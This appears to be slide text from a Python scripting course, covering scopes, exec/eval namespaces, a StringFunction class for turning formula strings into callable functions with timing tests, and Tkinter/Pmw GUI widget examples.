    vars(self): {'a': 3}
    self.a: 3
    local a: 4 global a: 1
    



    Demonstration of scopes (3)

    Variable interpolation with vars:
    class C(B):
        def write(self):
            local_var = -1
            s = '%(local_var)d %(global_var)d %(a)s' % vars()
    
    Problem: vars() returns dict with local variables and the string needs global, local, and class variables
    Primary solution: use printf-like formatting:
    s = '%d %d %d' % (local_var, global_var, self.a)
    
    More exotic solution:
    all = {}
    for scope in (locals(), globals(), vars(self)):
        all.update(scope)
    s = '%(local_var)d %(global_var)d %(a)s' % all
    
    (but now we overwrite a...)



    Namespaces for exec and eval

    exec and eval may take dictionaries for the global and local namespace:
    exec code in globals, locals
    eval(expr, globals, locals)
    
    Example:
    a = 8;  b = 9
    d = {'a':1, 'b':2}
    eval('a + b', d)  # yields 3
    
    and
    from math import *
    d['b'] = pi
    eval('a+sin(b)', globals(), d)  # yields 1
    
    Creating such dictionaries can be handy



    Generalized StringFunction class (1)

    Recall the StringFunction-classes for turning string formulas into callable objects
    f = StringFunction('1+sin(2*x)')
    print f(1.2)
    
    We would like:

    an arbitrary name of the independent variable
    parameters in the formula
    f = StringFunction_v3('1+A*sin(w*t)', 
                          independent_variable='t',
                          set_parameters='A=0.1; w=3.14159')
    print f(1.2)
    f.set_parameters('A=0.2; w=3.14159')
    print f(1.2)
    



    First implementation

  • Idea: hold independent variable and ``set parameters'' code as strings

  • Exec these strings (to bring the variables into play) right before the formula is evaluated
    class StringFunction_v3:
        def __init__(self, expression, independent_variable='x',
                     set_parameters=''):
            self._f_compiled = compile(expression, 
                                       '<string>', 'eval')
            self._var = independent_variable  # 'x', 't' etc.
            self._code = set_parameters
    
        def set_parameters(self, code):
            self._code = code
    
        def __call__(self, x):
            exec '%s = %g' % (self._var, x)  # assign indep. var.
            if self._code:  exec(self._code) # parameters?
            return eval(self._f_compiled)
    



    Efficiency tests

  • The exec used in the __call__ method is slow!

  • Think of a hardcoded function,
    def f1(x):
        return sin(x) + x**3 + 2*x
    
    and the corresponding StringFunction-like objects

  • Efficiency test (time units to the right):
    f1               :  1
    StringFunction_v1: 13
    StringFunction_v2:  2.3
    StringFunction_v3: 22
    
    Why?

  • eval w/compile is important; exec is very slow



    A more efficient StringFunction (1)

  • Ideas: hold parameters in a dictionary, set the independent variable into this dictionary, run eval with this dictionary as local namespace

  • Usage:
    f = StringFunction_v4('1+A*sin(w*t)', A=0.1, w=3.14159)
    f.set_parameters(A=2)   # can be done later
    



    A more efficient StringFunction (2)

  • Code:
    class StringFunction_v4:
        def __init__(self, expression, **kwargs):
            self._f_compiled = compile(expression, 
                                       '<string>', 'eval')
            self._var = kwargs.get('independent_variable', 'x')
            self._prms = kwargs
    	try:    del self._prms['independent_variable']
            except: pass
    
        def set_parameters(self, **kwargs):
            self._prms.update(kwargs)
    
        def __call__(self, x):
            self._prms[self._var] = x
            return eval(self._f_compiled, globals(), self._prms)
    



    Extension to many independent variables

  • We would like arbitrary functions of arbitrary parameters and independent variables:
    f = StringFunction_v5('A*sin(x)*exp(-b*t)', A=0.1, b=1,
                          independent_variables=('x','t'))
    print f(1.5, 0.01)  # x=1.5, t=0.01
    

  • Idea: add functionality in subclass
    class StringFunction_v5(StringFunction_v4):
        def __init__(self, expression, **kwargs):
            StringFunction_v4.__init__(self, expression, **kwargs)
            self._var = tuple(kwargs.get('independent_variables',
                              'x'))
            try:    del self._prms['independent_variables']
            except: pass
            
        def __call__(self, *args):
            for name, value in zip(self._var, args):
                self._prms[name] = value  # add indep. variable
            return eval(self._f_compiled, 
                        self._globals, self._prms)
    



    Efficiency tests

  • Test function: sin(x) + x**3 + 2*x
    f1               :  1
    StringFunction_v1: 13      (because of uncompiled eval)
    StringFunction_v2:  2.3
    StringFunction_v3: 22      (because of exec in __call__)
    StringFunction_v4:  2.3
    StringFunction_v5:  3.1    (because of loop in __call__)
    



    Removing all overhead

  • Instead of eval in __call__ we may build a (lambda) function
    class StringFunction:
        def _build_lambda(self):
            s = 'lambda ' + ', '.join(self._var)
            # add parameters as keyword arguments:
            if self._prms:
                s += ', ' + ', '.join(['%s=%s' % (k, self._prms[k]) \
                                       for k in self._prms])
            s += ': ' + self._f
            self.__call__ = eval(s, self._globals)
    

  • For a call
    f = StringFunction('A*sin(x)*exp(-b*t)', A=0.1, b=1,
                       independent_variables=('x','t'))
    
    the s looks like
    lambda x, t, A=0.1, b=1: return A*sin(x)*exp(-b*t)
    



    Final efficiency test

  • StringFunction objects are as efficient as similar hardcoded objects, i.e.,
    class F:
        def __call__(self, x, y):
            return sin(x)*cos(y)
    
    but there is some overhead associated with the __call__ op.

  • Trick: extract the underlying method and call it directly
    f1 = F()
    f2 = f1.__call__
    # f2(x,y) is faster than f1(x,y)
    
    Can typically reduce CPU time from 1.3 to 1.0

  • Conclusion: now we can grab formulas from command-line, GUI, Web, overhead}



    Adding pretty print and reconstruction

    ``Pretty print'':
    class StringFunction:
        ...
        def __str__(self):
            return self._f  # just the string formula
    
    Reconstruction: a = eval(repr(a))
        # StringFunction('1+x+a*y', 
                         independent_variables=('x','y'), 
                         a=1)
    
        def __repr__(self):
            kwargs = ', '.join(['%s=%s' % (key, repr(value)) \
                         for key, value in self._prms.items()])
            return "StringFunction1(%s, independent_variable=%s"
              ", %s)" % (repr(self._f), repr(self._var), kwargs)
    



    Examples on StringFunction functionality (1)

    >>> from py4cs.StringFunction import StringFunction
    >>> f = StringFunction('1+sin(2*x)')
    >>> f(1.2)
    1.6754631805511511
    
    >>> f = StringFunction('1+sin(2*t)', independent_variables='t')
    >>> f(1.2)
    1.6754631805511511
    
    >>> f = StringFunction('1+A*sin(w*t)', independent_variables='t', \
                           A=0.1, w=3.14159)
    >>> f(1.2)
    0.94122173238695939
    >>> f.set_parameters(A=1, w=1)
    >>> f(1.2)
    1.9320390859672263
    
    >>> f(1.2, A=2, w=1)   # can also set parameters in the call
    2.8640781719344526
    



    Examples on StringFunction functionality (2)

    >>> # function of two variables:
    >>> f = StringFunction('1+sin(2*x)*cos(y)', \
                           independent_variables=('x','y'))
    >>> f(1.2,-1.1)
    1.3063874788637866
    
    >>> f = StringFunction('1+V*sin(w*x)*exp(-b*t)', \
                           independent_variables=('x','t'))
    >>> f.set_parameters(V=0.1, w=1, b=0.1)
    >>> f(1.0,0.1)
    1.0833098208613807
    >>> str(f)  # print formula with parameters substituted by values
    '1+0.1*sin(1*x)*exp(-0.1*t)'
    >>> repr(f)
    "StringFunction('1+V*sin(w*x)*exp(-b*t)', 
    independent_variables=('x', 't'), b=0.10000000000000001, 
    w=1, V=0.10000000000000001)"
        
    >>> # vector field of x and y:
    >>> f = StringFunction('[a+b*x,y]', \
                               independent_variables=('x','y'))
    >>> f.set_parameters(a=1, b=2)
    >>> f(2,1)  # [1+2*2, 1]
    [5, 1]
    



    Exercise

    Implement a class for vectors in 3D
    Application example:
    >>> from Vec3D import Vec3D
    >>> u = Vec3D(1, 0, 0)  # (1,0,0) vector
    >>> v = Vec3D(0, 1, 0)
    >>> print u**v # cross product
    (0, 0, 1)
    >>> len(u)     # Eucledian norm
    1.0
    >>> u[1]       # subscripting
    0
    >>> v[2]=2.5   # subscripting w/assignment
    >>> u+v        # vector addition
    (1, 1, 2.5)
    >>> u-v        # vector subtraction
    (1, -1, -2.5)
    >>> u*v        # inner (scalar, dot) product
    0
    >>> str(u)     # pretty print
    '(1, 0, 0)'
    >>> repr(u)    # u = eval(repr(u))
    'Vec3D(1, 0, 0)'
    



    Exercise, 2nd part

    Make the arithmetic operators +, - and * more intelligent:
    u = Vec3D(1, 0, 0)
    v = Vec3D(0, -0.2, 8)
    a = 1.2
    u+v  # vector addition
    a+v  # scalar plus vector, yields (1.2, 1, 9.2)
    v+a  # vector plus scalar, yields (1.2, 1, 9.2)
    a-v  # scalar minus vector
    v-a  # scalar minus vector
    a*v  # scalar times vector
    v*a  # vector times scalar
    





    Simple GUI programming with Python




    Contents

    Introductory GUI programming
    Scientific Hello World examples
    GUI for simviz1.py
    GUI elements: text, input text, buttons, sliders, frames (for controlling layout)



    GUI toolkits callable from Python

    Python has interfaces to the GUI toolkits

    Tk (Tkinter)
    Qt (PyQt)
    wxWindows (wxPython)
    Gtk (PyGtk)
    Java Foundation Classes (JFC) (java.swing in Jython)
    Microsoft Foundation Classes (PythonWin)



    Discussion of GUI toolkits

    Tkinter has been the default Python GUI toolkit
    Most Python installations support Tkinter
    PyGtk, PyQt and wxPython are increasingly popular and more sophisticated toolkits
    These toolkits require huge C/C++ libraries (Gtk, Qt, wxWindows) to be installed on the user's machine
    Some prefer to generate GUIs using an interactive designer tool, which automatically generates calls to the GUI toolkit
    Some prefer to program the GUI code (or automate that process)
    It is very wise (and necessary) to learn some GUI programming even if you end up using a designer tool
    We treat Tkinter (with extensions) here since it is so widely available and simpler to use than its competitors
    See doc.html for links to literature on PyGtk, PyQt, wxPython and associated designer tools



    More info

    Ch. 6 in the course book
    ``Introduction to Tkinter'' by Lundh (see doc.html)
    Efficient working style: grab GUI code from examples
    Demo programs:
    $PYTHONSRC/Demo/tkinter
    demos/All.py in the Pmw source tree
    $scripting/src/gui/demoGUI.py
    



    Tkinter, Pmw and Tix

    Tkinter is an interface to the Tk package in C (for Tcl/Tk)
    Megawidgets, built from basic Tkinter widgets, are available in Pmw (Python megawidgets) and Tix
    Pmw is written in Python
    Tix is written in C (and as Tk, aimed at Tcl users)
    GUI programming becomes simpler and more modular by using classes; Python supports this programming style



    Scientific Hello World GUI

    Graphical user interface (GUI) for computing the sine of numbers
    The complete window is made of widgets
    (also referred to as windows)
    Widgets from left to right:

    a label with "Hello, World! The sine of"
    a text entry where the user can write a number
    pressing the button "equals" computes the sine of the number
    a label displays the sine value



    The code (1)

    #!/usr/bin/env python
    from Tkinter import *
    import math
    
    root = Tk()               # root (main) window
    top = Frame(root)         # create frame (good habit)
    top.pack(side='top')      # pack frame in main window
    
    hwtext = Label(top, text='Hello, World! The sine of')
    hwtext.pack(side='left')
    
    r = StringVar()  # special variable to be attached to widgets
    r.set('1.2')     # default value
    r_entry = Entry(top, width=6, relief='sunken', textvariable=r)
    r_entry.pack(side='left')
    



    The code (2)

    s = StringVar()  # variable to be attached to widgets
    def comp_s():
       global s
       s.set('%g' % math.sin(float(r.get())))  # construct string
    
    compute = Button(top, text=' equals ', command=comp_s)
    compute.pack(side='left')
    
    s_label = Label(top, textvariable=s, width=18)
    s_label.pack(side='left')
    
    root.mainloop()
    



    Structure of widget creation

    A widget has a parent widget
    A widget must be packed (placed in the parent widget) before it can appear visually
    Typical structure:
    widget = Tk_class(parent_widget, 
                      arg1=value1, arg2=value2)
    widget.pack(side='left')
    
    Variables can be tied to the contents of, e.g., text entries, but only special Tkinter variables are legal: StringVar, DoubleVar, IntVar



    The event loop

    No widgets are visible before we call the event loop:
    root.mainloop()
    
    This loop waits for user input (e.g. mouse clicks)
    There is no predefined program flow after the event loop is invoked; the program just responds to events
    The widgets define the event responses



    Binding events

    Instead of clicking "equals", pressing return in the entry window computes the sine value
    # bind a Return in the .r entry to calling comp_s:
    r_entry.bind('<Return>', comp_s)
    
    One can bind any keyboard or mouse event to user-defined functions
    We have also replaced the "equals" button by a straight label



    Packing widgets

    The pack command determines the placement of the widgets:
    widget.pack(side='left')
    
    This results in stacking widgets from left to right



    Packing from top to bottom

    Packing from top to bottom:
    widget.pack(side='top')
    
    results in

    Values of side: left, right, top, bottom



    Lining up widgets with frames

    Frame: empty widget holding other widgets
    (used to group widgets)
    Make 3 frames, packed from top
    Each frame holds a row of widgets
    Middle frame: 4 widgets packed from left



    Code for middle frame

    # create frame to hold the middle row of widgets:
    rframe = Frame(top)
    # this frame (row) is packed from top to bottom:
    rframe.pack(side='top')
    
    # create label and entry in the frame and pack from left:
    r_label = Label(rframe, text='The sine of')
    r_label.pack(side='left')
    
    r = StringVar()  # variable to be attached to widgets
    r.set('1.2')     # default value
    r_entry = Entry(rframe, width=6, relief='sunken', textvariable=r)
    r_entry.pack(side='left')
    



    Change fonts

    # platform-independent font name:
    font = 'times 18 bold'
    
    # or X11-style:
    font = '-adobe-times-bold-r-normal-*-18-*-*-*-*-*-*-*'
    
    hwtext = Label(hwframe, text='Hello, World!', 
                   font=font)
    



    Add space around widgets

    padx and pady adds space around widgets:

    hwtext.pack(side='top', pady=20)
    rframe.pack(side='top', padx=10, pady=20)
    



    Changing colors and widget size

    quit_button = Button(top, 
                         text='Goodbye, GUI World!', 
                         command=quit,
                         background='yellow', 
                         foreground='blue')
    quit_button.pack(side='top', pady=5, fill='x')
    
    # fill='x' expands the widget throughout the available
    # space in the horizontal direction
    



    Translating widgets

    The anchor option can move widgets:
    quit_button.pack(anchor='w')  
    # or 'center', 'nw', 's' and so on
    # default: 'center'
    
    ipadx/ipady: more space inside the widget
    quit_button.pack(side='top', pady=5, 
                     ipadx=30, ipady=30, anchor='w')
    



    Learning about pack

    Pack is best demonstrated through packdemo.tcl:
    $scripting/src/tools/packdemo.tcl
    



    The grid geometry manager

    Alternative to pack: grid
    Widgets are organized in m times n cells, like a spreadsheet
    Widget placement:
    widget.grid(row=1, column=5)
    
    A widget can span more than one cell
    widget.grid(row=1, column=2, columnspan=4)
    



    Basic grid options

    Padding as with pack (padx, ipadx etc.)
    sticky replaces anchor and fill



    Example: Hello World GUI with grid

    # use grid to place widgets in 3x4 cells:
    
    hwtext.grid(row=0, column=0, columnspan=4, pady=20)
    r_label.grid(row=1, column=0)
    r_entry.grid(row=1, column=1)
    compute.grid(row=1, column=2)
    s_label.grid(row=1, column=3)
    quit_button.grid(row=2, column=0, columnspan=4, pady=5, 
                     sticky='ew')
    



    The sticky option

    sticky='w' means anchor='w'
    (move to west)
    sticky='ew' means fill='x'
    (move to east and west)
    sticky='news' means fill='both'
    (expand in all dirs)



    Configuring widgets (1)

    So far: variables tied to text entry and result label
    Another method:

    ask text entry about its content
    update result label with configure
    Can use configure to update any widget property



    Configuring widgets (2)

    No variable is tied to the entry:
    r_entry = Entry(rframe, width=6, relief='sunken')
    r_entry.insert('end','1.2')  # insert default value
    
    r = float(r_entry.get())
    s = math.sin(r)
    
    s_label.configure(text=str(s))
    
    Other properties can be configured:
    s_label.configure(background='yellow')
    



    Glade: a designer tool

    With the basic knowledge of GUI programming, you may try out a designer tool for interactive automatic generation of a GUI
    Glade: designer tool for PyGtk
    Gtk, PyGtk and Glade must be installed (not part of Python!)
    See doc.html for introductions to Glade
    Working style: pick a widget, place it in the GUI window, open a properties dialog, set packing parameters, set callbacks (signals in PyGtk), etc.
    Glade stores the GUI in an XML file
    The GUI is hence separate from the application code



    GUI as a class

    GUIs are conveniently implemented as classes
    Classes in Python are similar to classes in Java and C++
    Constructor: create and pack all widgets
    Methods: called by buttons, events, etc.
    Attributes: hold widgets, widget variables, etc.
    The class instance can be used as an encapsulated GUI component in other GUIs (like a megawidget)



    The basics of Python classes

    Declare a base class MyBase:
    class MyBase:
    
        def __init__(self,i,j):  # constructor
            self.i = i; self.j = j
    
        def write(self):         # member function
            print 'MyBase: i=',self.i,'j=',self.j
    
    self is a reference to this object
    Data members are prefixed by self:
    self.i, self.j
    All functions take self as first argument in the declaration, but not in the call
    inst1 = MyBase(6,9); inst1.write()
    



    Implementing a subclass

    Class MySub is a subclass of MyBase:
    class MySub(MyBase):
    
        def __init__(self,i,j,k):  # constructor
            MyBase.__init__(self,i,j)
            self.k = k;
     
       def write(self):
            print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
    
    Example:
    # this function works with any object that has a write method:
    def write(v): v.write()
    
    # make a MySub instance
    inst2 = MySub(7,8,9)
    
    write(inst2)   # will call MySub's write
    



    Creating the GUI as a class (1)

    class HelloWorld:
        def __init__(self, parent):
            # store parent
            # create widgets as in hwGUI9.py
    
        def quit(self, event=None):
            # call parent's quit, for use with binding to 'q'
            # and quit button
    
        def comp_s(self, event=None):
            # sine computation
    
    root = Tk()
    hello = HelloWorld(root)
    root.mainloop()
    



    Creating the GUI as a class (2)

    class HelloWorld:
        def __init__(self, parent):
            self.parent = parent   # store the parent
            top = Frame(parent)    # create frame for all class widgets
            top.pack(side='top')   # pack frame in parent's window
    
            # create frame to hold the first widget row:
            hwframe = Frame(top)
            # this frame (row) is packed from top to bottom:
            hwframe.pack(side='top')
            # create label in the frame:
            font = 'times 18 bold'
            hwtext = Label(hwframe, text='Hello, World!', font=font)
            hwtext.pack(side='top', pady=20)
    



    Creating the GUI as a class (3)

            # create frame to hold the middle row of widgets:
            rframe = Frame(top)
            # this frame (row) is packed from top to bottom:
            rframe.pack(side='top', padx=10, pady=20)
    
            # create label and entry in the frame and pack from left:
            r_label = Label(rframe, text='The sine of')
            r_label.pack(side='left')
    
            self.r = StringVar() # variable to be attached to r_entry
            self.r.set('1.2')    # default value
            r_entry = Entry(rframe, width=6, textvariable=self.r)
            r_entry.pack(side='left')
            r_entry.bind('<Return>', self.comp_s)
    
            compute = Button(rframe, text=' equals ',
                             command=self.comp_s, relief='flat')
            compute.pack(side='left')
    



    Creating the GUI as a class (4)

            self.s = StringVar() # variable to be attached to s_label
            s_label = Label(rframe, textvariable=self.s, width=12)
            s_label.pack(side='left')
    
            # finally, make a quit button:
            quit_button = Button(top, text='Goodbye, GUI World!',
                                 command=self.quit,
                                 background='yellow', foreground='blue')
            quit_button.pack(side='top', pady=5, fill='x')
            self.parent.bind('<q>', self.quit)
    
        def quit(self, event=None):
            self.parent.quit()
    
        def comp_s(self, event=None):
            self.s.set('%g' % math.sin(float(self.r.get())))
    



    More on event bindings (1)

    Event bindings call functions that take an event object as argument:
    self.parent.bind('<q>', self.quit)
    
    def quit(self,event):    # the event arg is required!
        self.parent.quit()
    
    Button must call a quit function without arguments:
    def quit():
        self.parent.quit()
    
    quit_button = Button(frame, text='Goodbye, GUI World!',
                         command=quit)
    



    More on event bindings (1)

    Here is aunified quit function that can be used with buttons and event bindings:
    def quit(self, event=None):
        self.parent.quit()
    
    Keyword arguments and None as default value make Python programming effective!



    A kind of calculator

    Label + entry + label + entry + button + label

    # f_widget, x_widget are text entry widgets
    
    f_txt = f_widget.get()  # get function expression as string
    x = float(x_widget.get())   # get x as float
    #####
    res = eval(f_txt) # turn f_txt expression into Python code
    #####
    label.configure(text='%g' % res) # display f(x)
    



    Turn strings into code: eval and exec

    eval(s) evaluates a Python expression s
    eval('sin(1.2) + 3.1**8')
    
    exec(s) executes the string s as Python code
    s = 'x = 3; y = sin(1.2*x) + x**8'
    exec(s)
    
    Main application: get Python expressions from a GUI (no need to parse mathematical expressions if they follow the Python syntax!), build tailored code at run-time depending on input to the script



    A GUI for simviz1.py

    Recall simviz1.py: automating simulation and visualization of an oscillating system via a simple command-line interface
    GUI interface:



    The code (1)

    class SimVizGUI:
        def __init__(self, parent):
            """build the GUI"""
            self.parent = parent
            ...
            self.p = {}  # holds all Tkinter variables
            self.p['m'] = DoubleVar(); self.p['m'].set(1.0)
            self.slider(slider_frame, self.p['m'], 0, 5, 'm')
            
            self.p['b'] = DoubleVar(); self.p['b'].set(0.7)
            self.slider(slider_frame, self.p['b'], 0, 2, 'b')
    
            self.p['c'] = DoubleVar(); self.p['c'].set(5.0)
            self.slider(slider_frame, self.p['c'], 0, 20, 'c')
    



    The code (2)

        def slider(self, parent, variable, low, high, label):
            """make a slider [low,high] tied to variable"""
            widget = Scale(parent, orient='horizontal',
              from_=low, to=high,  # range of slider
              # tickmarks on the slider "axis":
              tickinterval=(high-low)/5.0,
              # the steps of the counter above the slider:
              resolution=(high-low)/100.0,
              label=label,    # label printed above the slider
              length=300,     # length of slider in pixels
              variable=variable)  # slider value is tied to variable
            widget.pack(side='top')
            return widget
    
        def textentry(self, parent, variable, label):
            """make a textentry field tied to variable"""
            ...
    



    Layout

    Use three frames: left, middle, right
    Place sliders in the left frame
    Place text entry fields in the middle frame
    Place a sketch of the system in the right frame



    The text entry field

    Version 1 of creating a text field: straightforward packing of labels and entries in frames:
    def textentry(self, parent, variable, label):
        """make a textentry field tied to variable"""
        f = Frame(parent)
        f.pack(side='top', padx=2, pady=2)
        l = Label(f, text=label)
        l.pack(side='left')
        widget = Entry(f, textvariable=variable, width=8)
        widget.pack(side='left', anchor='w')
        return widget
    



    The result is not good...

    The text entry frames (f) get centered:

    Ugly!



    Improved text entry layout

    Use the grid geometry manager to place labels and text entry fields in a spreadsheet-like fashion:
    def textentry(self, parent, variable, label):
        """make a textentry field tied to variable"""
        l = Label(parent, text=label)
        l.grid(column=0, row=self.row_counter, sticky='w')
        widget = Entry(parent, textvariable=variable, width=8)
        widget.grid(column=1, row=self.row_counter)
    
        self.row_counter += 1
        return widget
    
    You can mix the use of grid and pack, but not within the same frame



    The image

    sketch_frame = Frame(self.parent)
    sketch_frame.pack(side='left', padx=2, pady=2)
    
    gifpic = os.path.join(os.environ['scripting'],
                          'src','gui','figs','simviz2.xfig.t.gif')
    
    self.sketch = PhotoImage(file=gifpic)
    # (images must be tied to a global or class variable!)
    
    Label(sketch_frame,image=self.sketch).pack(side='top',pady=20)
    



    Simulate and visualize buttons

    Straight buttons calling a function
    Simulate: copy code from simviz1.py
    (create dir, create input file, run simulator)
    Visualize: copy code from simviz1.py
    (create file with Gnuplot commands, run Gnuplot)
    Complete script: src/py/gui/simvizGUI2.py



    Resizing widgets (1)

    Example: display a file in a text widget
    root = Tk()            
    top = Frame(root); top.pack(side='top')
    text = Pmw.ScrolledText(top, ...
    text.pack()
    # insert file as a string in the text widget:
    text.insert('end', open(filename,'r').read())
    
    Problem: the text widget is not resized when the main window is resized



    Resizing widgets (2)

    Solution: combine the expand and fill options to pack:
    text.pack(expand=1, fill='both')
    # all parent widgets as well:
    top.pack(side='top', expand=1, fill='both')
    
    expand allows the widget to expand, fill tells in which directions the widget is allowed to expand
    Try fileshow1.py and fileshow2.py!
    Resizing is important for text, canvas and list widgets



    Pmw demo program

    Very useful demo program in All.py (comes with Pmw)



    Test/doc part of library files

    A Python script can act both as a library file (module) and an executable test example
    The test example is in a special end block
    # demo program ("main" function) in case we run the script
    # from the command line:
    
    if __name__ == '__main__':
        root = Tkinter.Tk()
        Pmw.initialise(root)
        root.title('preliminary test of ScrolledListBox')
        # test:
        widget = MyLibGUI(root)
        root.mainloop()
    
    Makes a built-in test for verification
    Serves as documentation of usage





    Widget tour




    Demo script: demoGUI.py

    src/py/gui/demoGUI.py: widget quick reference



    Frame, Label and Button

    frame = Frame(top, borderwidth=5)
    frame.pack(side='top')
    
    header = Label(parent, text='Widgets for list data', 
                   font='courier 14 bold', foreground='blue',
                   background='#%02x%02x%02x' % (196,196,196))
    header.pack(side='top', pady=10, ipady=10, fill='x')
    
    Button(parent, text='Display widgets for list data',
           command=list_dialog, width=29).pack(pady=2)
    



    Relief and borderwidth

    # use a frame to align examples on various relief values:
    frame = Frame(parent); frame.pack(side='top',pady=15)
    # will use the grid geometry manager to pack widgets in this frame
    
    reliefs = ('groove', 'raised', 'ridge', 'sunken', 'flat')
    row = 0
    for width in range(0,8,2):
        label = Label(frame, text='reliefs with borderwidth=%d: ' % width)
        label.grid(row=row, column=0, sticky='w', pady=5)
        for i in range(len(reliefs)):
            l = Label(frame, text=reliefs[i], relief=reliefs[i],
                      borderwidth=width)
            l.grid(row=row, column=i+1, padx=5, pady=5)
        row += 1
    



    Bitmaps

    # predefined bitmaps:
    bitmaps = ('error', 'gray25', 'gray50', 'hourglass',
               'info', 'questhead', 'question', 'warning')
    
    Label(parent, text="""\
    Predefined bitmaps, which can be used to
    label dialogs (questions, info etc.)""",
          foreground='red').pack()
    
    frame = Frame(parent); frame.pack(side='top', pady=5)
    
    for i in range(len(bitmaps)):  # write name of bitmaps
        Label(frame, text=bitmaps[i]).grid(row=0, column=i+1)
    
    for i in range(len(bitmaps)):  # insert bitmaps
        Label(frame, bitmap=bitmaps[i]).grid(row=1, column=i+1)
    



    Tkinter text entry

    Label and text entry field packed in a frame
    # basic Tk:
    frame = Frame(parent); frame.pack()
    Label(frame, text='case name').pack(side='left')
    entry_var = StringVar(); entry_var.set('mycase')
    
    e = Entry(frame, textvariable=entry_var, width=15,
              command=somefunc)
    
    e.pack(side='left')
    



    Pmw.EntryField

    Nicely formatted text entry fields

    case_widget = Pmw.EntryField(parent,
                   labelpos='w', 
                   label_text='case name',
                   entry_width=15,
                   entry_textvariable=case,
                   command=status_entries)
    
    # nice alignment of several Pmw.EntryField widgets:
    widgets = (case_widget, mass_widget,
               damping_widget, A_widget,
               func_widget)
    Pmw.alignlabels(widgets)
    



    Input validation

    Pmw.EntryField can validate the input
    Example: real numbers larger than 0:
    mass_widget = Pmw.EntryField(parent,
                labelpos='w',  # n, nw, ne, e and so on
                label_text='mass',
    
                validate={'validator': 'real', 'min': 0},
    
                entry_width=15,
                entry_textvariable=mass,
                command=status_entries)
    
    Writing letters or negative numbers does not work!



    Balloon help

    A help text pops up when pointing at a widget

    # we use one Pmw.Balloon  for all balloon helps:
    balloon = Pmw.Balloon(top)  
    
    ...
    
    balloon.bind(A_widget,
             'Pressing return updates the status line')
    
    Point at the 'Amplitude' text entry and watch!



    Option menu

    Seemingly similar to pulldown menu
    Used as alternative to radiobuttons or short lists
    func = StringVar(); func.set('y')
    func_widget = Pmw.OptionMenu(parent,
           labelpos='w',  # n, nw, ne, e and so on
           label_text='spring',
           items=['y', 'y3', 'siny'],
           menubutton_textvariable=func,
           menubutton_width=6,
           command=status_option)
    
    def status_option(value):
        # value is the current value in the option menu
    



    Slider

    y0 = DoubleVar();  y0.set(0.2)
    y0_widget = Scale(parent,
         orient='horizontal',
         from_=0, to=2,    # range of slider
         tickinterval=0.5, # tickmarks on the slider "axis"
         resolution=0.05,  # counter resolution
         label='initial value y(0)',  # appears above
         #font='helvetica 12 italic', # optional font
         length=300,                  # length=300 pixels
         variable=y0,            
         command=status_slider)
    



    Checkbutton

    GUI element for a boolean variable

    store_data = IntVar(); store_data.set(1)
    store_data_widget = Checkbutton(parent,
               text='store data',
               variable=store_data,
               command=status_checkbutton)
    
    def status_checkbutton():
        text = 'checkbutton : ' \
               + str(store_data.get())
        ...
    



    Menu bar

    menu_bar = Pmw.MenuBar(parent,
                  hull_relief='raised',
                  hull_borderwidth=1,
                  balloon=balloon,
                  hotkeys=1)  # define accelerators
    menu_bar.pack(fill='x')
    
    # define File menu:
    menu_bar.addmenu('File', None, tearoff=1)
    



    MenuBar pulldown menu

    menu_bar.addmenu('File', None, tearoff=1)
    
    menu_bar.addmenuitem('File', 'command',
         statusHelp='Open a file', label='Open...',
         command=file_read)
    
    ...
    menu_bar.addmenu('Dialogs',
         'Demonstrate various Tk/Pmw dialog boxes')
    ...
    menu_bar.addcascademenu('Dialogs', 'Color dialogs',
         statusHelp='Exemplify different color dialogs')
    
    menu_bar.addmenuitem('Color dialogs', 'command',
         label='Tk Color Dialog',
         command=tk_color_dialog)
    



    List data demo



    List data widgets

    List box (w/scrollbars); Pmw.ScrolledListBox
    Combo box; Pmw.ComboBox
    Option menu; Pmw.OptionMenu
    Radio buttons; Radiobutton or Pmw.RadioSelect
    Check buttons; Pmw.RadioSelect
    Important:

    long or short list?
    single or multiple selection?



    List box

    list = Pmw.ScrolledListBox(frame,
      listbox_selectmode = 'single', # 'multiple'
      listbox_width = 12, listbox_height = 6,
      label_text = 'plain listbox\nsingle selection',
      labelpos = 'n',  # label above list ('north') 
      selectioncommand = status_list1)
    



    More about list box

    Call back function:
    def status_list1():
        """extract single selections"""
        selected_item   = list1.getcurselection()[0]
        selected_index = list1.curselection()[0]
    
    Insert a list of strings (listitems):
    for item in listitems:  
        list1.insert('end', item) # insert after end
    



    List box; multiple selection

    Can select more than one item:
    list2 = Pmw.ScrolledListBox(frame,
           listbox_selectmode = 'multiple',
           ...
           selectioncommand = status_list2)
    ...
    def status_list2():
        """extract multiple selections"""
        selected_items   = list2.getcurselection() # tuple
        selected_indices = list2.curselection()    # tuple
    



    Tk Radiobutton

    GUI element for a variable with distinct values

    radio_var = StringVar() # common variable
    radio1 = Frame(frame_right)
    radio1.pack(side='top', pady=5)
    
    Label(radio1,
        text='Tk radio buttons').pack(side='left')
    
    for radio in ('radio1', 'radio2', 'radio3', 'radio4'):
        r = Radiobutton(radio1, text=radio, variable=radio_var,
                        value='radiobutton no. ' + radio[5],
                        command=status_radio1)
        r.pack(side='left')
    
    ...
    
    def status_radio1():
        text = 'radiobutton variable = ' + radio_var.get()
        status_line.configure(text=text)
    



    Pmw.RadioSelect radio buttons

    GUI element for a variable with distinct values

    radio2 = Pmw.RadioSelect(frame_right,
           selectmode='single',
           buttontype='radiobutton',
           labelpos='w',
           label_text='Pmw radio buttons\nsingle selection',
           orient='horizontal',
           frame_relief='ridge', # try some decoration...
           command=status_radio2)
    
    for text in ('item1', 'item2', 'item3', 'item4'):
        radio2.add(text)
     radio2.invoke('item2')  # 'item2' is pressed by default
    
    def status_radio2(value):
        ...
    



    Pmw.RadioSelect check buttons

    GUI element for a variable with distinct values

    radio3 = Pmw.RadioSelect(frame_right,
           selectmode='multiple',
           buttontype='checkbutton',
           labelpos='w',
           label_text='Pmw check buttons\nmultiple selection',
           orient='horizontal',
           frame_relief='ridge', # try some decoration...
           command=status_radio3)
    
    def status_radio3(value, pressed):
        """
        Called when button value is pressed (pressed=1)
        or released (pressed=0)
        """
        ... radio3.getcurselection() ...
    



    Combo box

    combo1 = Pmw.ComboBox(frame,
            label_text='simple combo box',
            labelpos = 'nw',
            scrolledlist_items = listitems,
            selectioncommand = status_combobox,
            listbox_height = 6,
            dropdown = 0)
    
    def status_combobox(value):
        text = 'combo box value = ' + str(value)
    



    Tk confirmation dialog

    import tkMessageBox
    ...
    message = 'This is a demo of a Tk conformation dialog box'
    ok = tkMessageBox.askokcancel('Quit', message)
    if ok:
        status_line.configure(text="'OK' was pressed")
    else:
